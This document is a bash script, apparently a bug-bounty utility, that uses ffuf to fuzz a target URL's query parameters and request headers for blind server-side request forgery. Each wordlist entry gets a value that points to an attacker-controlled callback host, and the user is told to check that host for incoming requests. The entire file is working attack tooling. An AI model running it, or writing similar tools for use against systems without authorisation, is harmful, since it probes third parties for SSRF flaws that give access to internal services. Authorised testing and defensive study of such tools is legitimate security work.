ssrfuck.sh
#!/usr/bin/env bash
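# Target URL to fuzz, schema included (first positional argument).
DOMAIN=$1
# Host that records out-of-band callbacks, usually your Burp collaborator,
# given without the http/s schema (second positional argument).
SSRF_CATCHER=$2

# Reduce a URL to its bare host by stripping the schema, the path and a
# trailing numeric port.
# Arguments: $1 - URL to reduce
# Outputs:   the bare host on stdout
_clean_domain() {
  # The value is passed quoted through printf so that characters common in
  # URLs ('?', '*', runs of spaces) are neither glob-expanded against the
  # working directory nor collapsed by word splitting before sed sees them.
  printf '%s\n' "$1" | sed -e 's|^[^/]*//||' -e 's|/.*$||' -e 's/:[0-9]*$//'
}

# "Clean" domain without the schema; used in the ffuf output file names and
# in the callback hostnames.
DOMAIN_CLEAN=$(_clean_domain "${DOMAIN}")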
# Print the ASCII-art banner in red, then reset the terminal colour.
# Outputs: banner text and ANSI colour escapes on stdout
banner() {
  local red="\033[31m"
  local reset="\033[0m"

  # %b expands the backslash escapes, matching what `echo -e` did.
  printf '%b' "${red}"
  # Quoted delimiter: the art is emitted literally, backticks included.
  cat << "EOF"
_____ _________________ _
/ ___/ ___| ___ \ ___| | |
\ `--.\ `--.| |_/ / |_ _ _ ___| | __
`--. \`--. \ /| _| | | |/ __| |/ /
/\__/ /\__/ / |\ \| | | |_| | (__| <
\____/\____/\_| \_\_| \__,_|\___|_|\_\
# By 2RS3C (https://twitter.com/2RS3C)
EOF
  printf '%b' "${reset}"
}
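# Fuzz query-parameter names on the target with ffuf.
#
# Each word from parameters.txt (resolved against the current directory)
# replaces both FUZZ keywords, so it is used as the parameter name and as a
# prefix of the callback hostname.
# Globals:   DOMAIN, DOMAIN_CLEAN, SSRF_CATCHER (read)
# Outputs:   ffuf report at ./ffuf-output/<DOMAIN_CLEAN>-parameters.json;
#            ffuf's own stdout and stderr are discarded, so a missing
#            wordlist or an unwritable output path is visible only through
#            the return status
# Returns:   ffuf's exit status
fuzz_params() {
  # The -o path is quoted: DOMAIN_CLEAN is derived from a command-line
  # argument and must reach ffuf as a single word.
  ffuf -w parameters.txt \
    -u "${DOMAIN}?FUZZ=https:%2F%2FFUZZ-${DOMAIN_CLEAN}.${SSRF_CATCHER}" \
    -timeout 3 \
    -o "./ffuf-output/${DOMAIN_CLEAN}-parameters.json" \
    > /dev/null 2>&1
}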
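# Fuzz request-header names on the target with ffuf.
#
# Each word from headers.txt (resolved against the current directory)
# replaces both FUZZ keywords, so it is used as the header name and as a
# prefix of the callback hostname carried in that header's value.
# Globals:   DOMAIN, DOMAIN_CLEAN, SSRF_CATCHER (read)
# Outputs:   ffuf report at ./ffuf-output/<DOMAIN_CLEAN>-headers.json;
#            ffuf's own stdout and stderr are discarded, so a missing
#            wordlist or an unwritable output path is visible only through
#            the return status
# Returns:   ffuf's exit status
fuzz_headers() {
  # The -o path is quoted: DOMAIN_CLEAN is derived from a command-line
  # argument and must reach ffuf as a single word.
  ffuf -w headers.txt \
    -u "${DOMAIN}" \
    -H "FUZZ: http://FUZZ-${DOMAIN_CLEAN}.${SSRF_CATCHER}" \
    -timeout 3 \
    -o "./ffuf-output/${DOMAIN_CLEAN}-headers.json" \
    > /dev/null 2>&1
}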
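####### Start #######
banner

# Both positional arguments are required. Without them ffuf would be started
# with an empty target or an empty callback host, and because its output is
# discarded the run would look like it succeeded.
if [[ -z "${DOMAIN}" || -z "${SSRF_CATCHER}" ]]; then
  printf 'Usage: %s <target-url> <callback-host-without-schema>\n' "${0##*/}" >&2
  exit 2
fi

# The reports are written under ./ffuf-output. ffuf is not expected to create
# that directory for an -o path (TODO confirm), so make sure it exists.
mkdir -p ./ffuf-output || exit 1

echo "[-] Fuzzing parameters in ${DOMAIN}."
if ! fuzz_params; then
  # ffuf's own messages are silenced inside fuzz_params; surface the failure.
  echo "[!] ffuf failed while fuzzing parameters (check parameters.txt and ./ffuf-output)." >&2
fi

echo "[-] Fuzzing headers in ${DOMAIN}."
if ! fuzz_headers; then
  # ffuf's own messages are silenced inside fuzz_headers; surface the failure.
  echo "[!] ffuf failed while fuzzing headers (check headers.txt and ./ffuf-output)." >&2
fi

echo "[+] Done fuzzing in ${DOMAIN}."
echo "[+] Check for requests on your server (${SSRF_CATCHER})."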